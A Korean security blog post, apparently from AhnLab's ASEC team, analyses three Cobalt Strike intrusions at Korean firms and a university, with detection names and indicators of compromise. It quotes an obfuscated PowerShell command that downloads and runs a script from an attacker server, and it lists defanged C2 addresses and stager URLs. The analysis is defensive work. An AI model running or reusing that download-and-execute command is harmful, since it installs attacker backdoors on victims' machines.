국내 기업을 타겟으로 유포 중인 코발트 스트라이크 (2)

ASEC 분석팀은 코발트 스트라이크 해킹 툴에 의한 공격을 모니터링하고 있으며, 여기에서는 과거 다루었던 블로그 이후부터 현재까지 확인된 코발트 스트라이크 공격에 대해 정리하도록 한다.

4월 23일 확인된 공격을 보면 코발트 스트라이크 beacon이 다음과 같은 커맨드라인을 갖는 프로세스에 의해 실행되었다. 코발트 스트라이크를 이용하는 공격자들은 보통 정상 프로세스로 위장시키기 위해, 정상 프로세스에 특정 인자까지 지정한 후 실행하고 여기에 실제 백도어인 beacon을 인젝션하는 방식을 사용한다. 이는 코발트 스트라이크 해킹 툴에서 실제 지원하는 기능이다.

svchost.exe -k LocalServiceNetworkRestricted

위의 beacon 프로세스가 실행되기 이전에는 다음과 같은 난독화된 파워쉘 커맨드 라인 로그가 확인되었다.

powershell.exe “$dadf=’IEX(New-Object Net.WebClient).D’;$ien=’ownloadString(”hxxp://hcut.co[.]kr/api/runtime.ps1”)’;$nv3=’IEX(New-Object Net.WebClient).Do’;$qc=’wnloadString…(이하생략)

다운로드 받아지는 runtime.ps1은 실제로 Invoke-Shellcode.ps1이며 이는 또 다른 파워쉘 기반 공격 툴인 PowerSploit 및 Empire에서 제공하는 파워쉘 스크립트이다. Invoke-Shellcode는 이름과 같이 인자로 쉘코드 페이로드를 받아 실행시키는 기능을 담당한다. 즉 Invoke-Shellcode.ps1을 통해 코발트 스트라이크를 설치했을 것으로 추정된다.

runtime.ps1 : Invoke-Shellcode.ps1 ( 다운로드 주소 : hxxp://hcut.co[.]kr/api/runtime.ps1 )

설치된 이후에는 다음과 같이 정보 획득 및 코인 마이너 악성코드들을 생성한 이력이 확인된다.

na.exe : 하드웨어 정보 획득
1.exe : XMRig 코인 마이너 인젝터. 정상 동작 불가.
2.exe : XMRig 코인 마이너 인젝터. 정상 동작 불가.

참고로 감염 환경에서는 과거에도 이미 코발트 스트라이크 및 코인 마이너 악성코드들이 설치된 이력이 존재한다.

2008.exe : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://103.39.108[.]20:2008/cDIl )
2008a.exe : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://103.39.108[.]20:2008/eZ5h )
bits_se.exe : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://103.39.108[.]20:2008/cDIl )
k64.src : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://www.pc1024[.]net:3322/NDaj )
shellcode.dll : 코발트 스트라이크 Stager ( beacon 다운로드 주소 : hxxp://103.39.108[.]20:2008/yGYC )
51032u.exe : 코인 마이너 인스톨러
avmi.exe : XMRig 코인 마이너
xmrig.exe : XMRig 코인 마이너
svchost.exe : NSSM 서비스 관리자

다음으로 3월 16일에 확인된 사례가 있다. 유포된 기업은 특정 기업의 계열사로 추정된다. 파워쉘(powershell) 프로세스가 특정 폴더에 있는 악성 스크립트(%temp%\tmp5O91.ps1)를 실행하여 비컨을 다운로드 하려는 행위가 포착되었다.

해당 스크립트는 Base64 디코딩 과정 없이 XOR(0x35) 후 쉘코드를 메모리에 로드한다.

위 쉘코드는 비컨을 다운로드하는 ‘Stager’ 형태로 최하단의 C2(pilottrustme[.]top, 54.238.214[.]219)로부터 비컨 다운로드를 시도한다. 하지만 현재 연결이 되지 않아 이후 비컨에 대한 정보를 확인할 수 없다.

마지막으로 3월 26일, 국내 모 대학교에서 감염이 확인되었다. 확인된 샘플은 msvcruntime.exe라는 이름으로 Time Date Stamp(빌드 시간) 값이 없이 유포되었으며, 오픈 소스 패커인 ‘PEzor’를 사용했으며 최종적으로 특정 쉘코드를 실행한다. 최종적으로 실행되는 쉘코드는 비컨을 다운로드하는 쉘코드로, 코발트 스트라이크에서는 이를 ‘Stager’ 페이로드 방식이라 부른다.

해당 쉘코드가 접속하는 C2 도메인은 좌측 하단의 ‘oxoo[.]cc’이다. 하지만 현재 ‘404 Not Found’로 연결되지 않아 비컨을 다운로드 할 수 없어 비컨에 대한 이후 정보를 확인할 수 없다.

안랩 제품에서는 코발트 스트라이크를 활용한 첫 침투 단계부터 내부 확산 시 사용되는 비컨 백도어에 대해 프로세스 메모리 기반의 탐지 방식과 행위 기반의 탐지 기술을 보유하고 있다.

[파일 진단]
– Trojan/PowerShell.InvokeShell (2021.04.27.00)
– Infostealer/Win.Sysinfo.C4439416 (2021.04.26.03)
– CoinMiner/Win.XMRig.C4439427 (2021.04.27.00)
– Trojan/Win32.CobaltStrike.R329694 (2020.11.26.06)
– Malware/Win32.Generic.C1883131 (2017.03.27.01)
– Trojan/Win32.RL_Generic.R292199 (2019.09.20.01)
– Trojan/Win32.Wacatac.R355370 (2020.11.11.02)
– CoinMiner/Win.Agent.C4439419 (2021.04.26.03)
– Trojan/Win64.XMR-Miner.R226842 (2019.12.11.01)
– Unwanted/Win.NSSM.C4439418 (2021.04.26.03)
– Trojan/PS.Cobalt (2021.04.06.00)
– Trojan/Win.CobaltStrike.C4399063 (2021.04.01.01)

[IOC 정보]

파일
– runtime.ps1 : 7facee76cab5717349fe6c2d913a1961
– na.exe : b9a376b33f6307c8c2669360ae2dae01
– 1.exe : 7f2fb6bac0ecd067cf1f183ee07bc95c
– 2.exe : d8b503bedaa4077fa566c25c6c4b8f32
– 2008.exe : ff2af38bf23d9a6b1f8da12626c5f6a4
– 2008a.exe : 9917e7ef06e7fc2761144c4abef0cdc2
– bits_se.exe : 6d853d078b9865dd3d6aba653d42083b
– k64.src : 179e60db8beeecfe14b2c1ea922e65e3
– shellcode.dll : 17730a73ffbb0e6145658783e5207d6d
– 51032u.exe : 6c1feef64ae04ce2f45b703706c43ef5
– avmi.exe : a2074ca640b5a57662622e49ac742bb1
– xmrig.exe : 0ea5d36707f6d07b82a1f9d707d4c913
– svchost.exe : 6e64c6b59e22247b0f07db49ea651cc8
– tmp5O91.ps1 : d782dd504419ef0699d65cfa8c673700
– msvcruntime.exe : f990c4df6a580794cb6fd1d4fafe64b8

URL
– hcut.co[.]kr/api/runtime.ps1
– 103.39.108[.]20:2008/cDIl
– 103.39.108[.]20:2008/eZ5h
– 103.39.108[.]20:2008/yGYC
– www. pc1024[.]net:3322/NDaj
– pilottrustme[.]top
– oxoo[.]cc

5 1 vote
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments